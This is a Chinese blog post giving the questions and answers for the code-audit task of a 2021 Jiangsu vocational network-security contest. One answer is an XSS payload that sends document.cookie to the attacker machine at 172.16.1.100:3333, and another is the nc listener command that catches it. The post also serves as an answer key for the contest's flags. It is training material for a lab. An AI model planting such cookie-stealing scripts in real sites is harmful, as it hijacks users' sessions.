2021年江苏省职业院校技能大赛中职网络信息安全赛项试卷

最新推荐文章于 2023-04-16 14:28:21 发布
最新推荐文章于 2023-04-16 14:28:21 发布
阅读量1.8k 收藏 10
点赞数 2
分类专栏: 网络安全 文章标签: 概率论
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/FogIslandBay/article/details/120422542
版权

任务三:代码审计

  •  在渗透机Kali Linux中访问靶机服务器Web页面,注册账号并登陆,找到存在XSS执行漏洞的页面,将该页面中存在XSS执行漏洞的对象名作为FLAG提交;(2分)
  • 构造Cookie反弹JS脚本,将该JS代码中使用的对象及方法作为FLAG(形式:对象.方法)进行提交;(2分)
  • 在渗透机Kali Linux中重启Web服务,将重启使用的命令作为FLAG进行提交;(2分)
  • 在靶机服务器中利用原有的XSS漏洞调用上述JS脚本,在渗透机Kali Linux中开启3333端口监听,将开启端口监听使用的命令作为FLAG提交;(2分)
  • 在渗透机Kali Linux中开启3333端口监听,将开启端口监听后接收回应的第一行的第一个单词作为FLAG提交;(2分)
  • 在渗透机Kali Linux中开启3333端口监听,将开启端口监听后接收回应的第五行的最后一个单词作为FLAG提交。(2分) 

第一题在页面中存在xss执行漏洞的对象

 Flag:name

第二题:构造cookie脚本

document.write('<img src="http://172.16.1.100:3333/xss?val='document.cookie +'" width=0 height=0 />')

js代码中使用的对象和方法

Flag:document.write

第三题重启web服务

Flag:service apache2 restart

第四题 开启端口监听使用的命令作为flag提交

Flag:nc -l -p

第五题 监听后接收回应的第一行的第一个单词

Flag:GET

 第六 监听后接收回应的第五行最后一个的单词

Flag:deflate 

FogIslandBay0324
关注
  • 2
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 3
    评论
专栏目录
2023中职网络安全竞赛——代码审计解析(详细)
旺仔Sec&blog
03-13 557
2023中职网络安全竞赛——代码审计解析(详细)
2021江苏省职业院校技能大赛中职网络安全
PushSafe
04-04 2211
2021江苏省职业院校技能大赛中职 网络信息安全赛项试卷(学生组) 一、 竞赛时间 共计180分钟。 二、 竞赛阶段 竞赛阶段 任务阶段 竞赛任务 竞赛时间 分值 第一阶段单兵模式系统渗透测试 任务一 攻击日志分析 100分钟 10 任务二 系统漏洞利用与提权 10 任务三 代码审计 12 任务四 Web安全渗透测试 12 任务五 Linux操作系统渗透测试 12 任务六 端口扫描Python渗透测试 14 备战阶段 攻防对抗准备工作 20分钟 0 第二阶段分组对抗 系统加固 15分钟 3
2021江苏省职业院校技能大赛中职 网络信息安全赛项试卷--攻击日志解析
Aluxian_的博客
01-12 1579
2021江苏省职业院校技能大赛中职 网络信息安全赛项 attack.pacapng攻击日志分析2021江苏省攻击日志分析任务书2021江苏省攻击日志分析任务书解析如果有不懂得地方可以私信博主,欢迎交流!!交流群:603813289(刚建的)需要环境得 可以加博主联系方式 :QQ:3260344435 (根据标准答案做得) 2021江苏省攻击日志分析任务书 2021江苏省攻击日志分析 任务环境说明: 服务器场景:PYsystem0031 服务器场景操作系统:未知 服务器场景FTP用户名:an
B-5:代码审计
最新发布
m0_45155797的博客
04-16 310
B-5:代码审计 任务环境说明: ● 服务器场景:PYsystem002 ● 服务器场景操作系统:未知(显示链接) ● 服务器用户名:未知 密码:未知 1. 在渗透Kali Linux访问靶机服务器Web页面注册账号登陆存在XSS行漏洞的页面,将该页面存在XSS行漏洞的对象名作为FLAG提交; 2. 构造Cookie反弹JS脚本,将该JS代码使用的对象及方法作为FLAG(形式:对象.方法)进行提交; 3. 在渗透Kali Linux重启Web服务,将重启使用的命令作为FLAG进行提
Kali Linux 网络安全渗透测试
06-02
为什么学网络安全?1. 市场巨大每各安全厂商收入高达400亿左右,随着5G的发展,万物互联时代,市场将进一步扩大。2. 薪资高网安人才的匮乏,用人开出招聘薪资往往高于求职者的预期。3. 靠能力说话在网络安全专业,专业技能竞争力要远高于学历本身。在网安专业只看能力不看学历也成了大家公认的原则。 网络安全未来10的发展前景现代人的生活与网络息息相关,个人、企业信息的安全显示尤为重要,2018报告的信息安全事件比2017有所增加,一几千万次。应对网络安全挑战,已越来越被重视。不管你是否从事网络安全行业相关工作,信息安全都显得越来越重要。 注意:视频教学内容仅用于网络安全渗透测试。其他行为,自己承担相应的责任,与作者无关。 
2021山东省职业院校技能大赛网络搭建与应用赛项正式赛题
03-02
2021山东省职业院校技能大赛网络搭建与应用赛项正式赛题
2021山东省职业院校技能大赛网络安全赛项C模块Linux靶机
04-29
假定你是某企业的网络安全渗透测试工程师,负责企业某些服务器的安全防护,为了更好的寻企业网络可能存在的各种问题和漏洞。你尝试利用各种攻击手段,攻击特定靶机,以便了解最新的攻击手段和技术,了解网络黑客...
2020安徽省职业院校技能大赛中职组计算平面设计赛项规程.docx
06-03
2020安徽省职业院校技能大赛中职组计算平面设计赛项规程.docx2020安徽省职业院校技能大赛中职组计算平面设计赛项规程.docx2020安徽省职业院校技能大赛中职组计算平面设计赛项规程.docx2020安徽省职业...
2021全国职业院校职业技能大赛中职网络搭建与应用赛项网络设备答案详解
05-31
2021全国职业院校职业技能大赛中职网络搭建与应用赛项网络设备答案详解
2021全国职业院校技能大赛网络搭建与应用”赛项竞赛试题答案.rar
11-13
2021全国职业院校技能大赛网络搭建与应用”赛项竞赛试题答案
2022山东省职业院校技能大赛中职组“网络搭建与应用”赛题题库
12-23
2022山东省职业院校技能大赛中职组“网络搭建与应用”赛题题库 2022山东省“网络搭建与应用”赛题题库 通过竞赛,检验参赛选手的计算网络的拓扑规划能力、IP地址规划能力、综合布线的施工测试能力、设备配置与...
2020安徽省职业院校技能大赛中职组计算平面设计赛项规程.pdf
06-01
2020安徽省职业院校技能大赛中职组计算平面设计赛项规程.pdf2020安徽省职业院校技能大赛中职组计算平面设计赛项规程.pdf2020安徽省职业院校技能大赛中职组计算平面设计赛项规程.pdf2020安徽省职业院校...
2023江苏省职业院校技能大赛中职组“网络搭建与应用”赛题
03-08
2023江苏省职业院校技能大赛中职组“网络搭建与应用”赛题题库 2023江苏省网络搭建与应用”赛题题库 通过竞赛,检验参赛选手的计算网络的拓扑规划能力、IP地址规划能力、综合布线的施工测试能力、设备配置与...
2021 河南省等职业教育技能大赛网络安全”项目比赛任务书
05-09
2021 河南省等职业教育技能大赛网络安全”项目比赛任务书 比赛真题
2021 中职网络安全山东省职业院校技能大赛
04-07
2021 山东省职业院校技能大赛 中职组“网络安全”赛项正式赛卷
Kali Linux Web 渗透测试秘籍 第四章 漏洞发现
热门推荐
龙哥盟
10-10 4万+
第四章 漏洞发现 作者:Gilberto Najera-Gutierrez 译者:飞龙 协议:CC BY-NC-SA 4.0 简介我们现在已经完成了渗透测试的侦查阶段,并且识别了应用所使用的服务器和开发框架的类型,以及一些可能的弱点。现在是实际测试应用以及检测它的漏洞的时候了。这一章,我们会涉及到检测一些 Web 应用常见漏洞的过程,以及允许我们发现和利用它们的工具。我们
Kali Linux学习笔记—Web渗透(6)手动漏洞挖掘 SQL盲注
weixin_43653897的博客
12-22 337
手动漏洞挖掘 SQL盲注 metasploitable:172.16.2.65 Security Level:low kali linux:172.16.2.63 不显示数据库内建的报错信息 内建的报错信息帮助开发人员发现和修复问题 报错信息提供关于系统的大量有用信息 当程序员隐藏了数据库内建报错信息,替换为通用的报错提示,sql注入将无法依据报错信息判断注入语句的行结果,即 盲。 思路:既然无法基于报错信息判断结果,可以基于逻辑真假的不同结果来判断 1' and 1=1--+ 1' and 1
靶机渗透测试(BSides-Vancouver-2018-Workshop)
@小张小张的博客
09-11 597
靶机渗透测试(BSides): Vulnhub靶机 BSides-Vancouver-2018-Workshop 靶机:修改靶机网络配置为桥接模式。 攻击Kali虚拟,同样使用桥接模式,即可访问靶机靶机难度:(初级) 目标:成功渗透进入靶机到flag.txt,提权到root权限。 渗透流程: 1.探测主ip:(netdiscover -i eth0 -r 网关) 2.nmap扫描目标主端口服务: 目标主开启了21-ftp,22-ssh,80-http等服务端口; 3.web渗透
15. CTF综合靶机渗透(八)
weixin_30651273的博客
07-05 472
VM Name: BlackMarket VM Description: BlackMarket VM presented at Brisbane SecTalks BNE0x1B (28th Session) which is focused on students and other InfoSec Professional. This VM has total 6 flag and o...
湖北省网络安全技能大赛中职组赛题
04-06
本次比赛为湖北省网络安全技能大赛中职组赛题,共包含以下两个题目: 1. 网络安全基础知识测试题 本题为选择题,共有20道题目,考察参赛选手的网络安全基础知识,包括密码学、网络攻击与防御、网络安全法律法规等方面。每题有4个选项,其只有1个是正确答案。选手需在规定时间内回答所有题目,得分将根据回答正确的题目数量进行评定。 2. 网络安全攻防演练题 本题为实践题,要求参赛选手在规定时间内完成一次网络安全攻防演练。参赛选手将扮演攻击方或防御方的角色,攻击方需尝试入侵防御方的网络系统,防御方需保护自己的网络系统不被攻击方入侵。攻防演练将在一个虚拟网络环境进行,参赛选手需使用自己的技能和知识进行攻击或防御,并在规定时间内得分最高者获胜。 总评分将根据选手在两个题目的表现进行评定,得分高者将获得比赛胜利。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

FogIslandBay0324

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值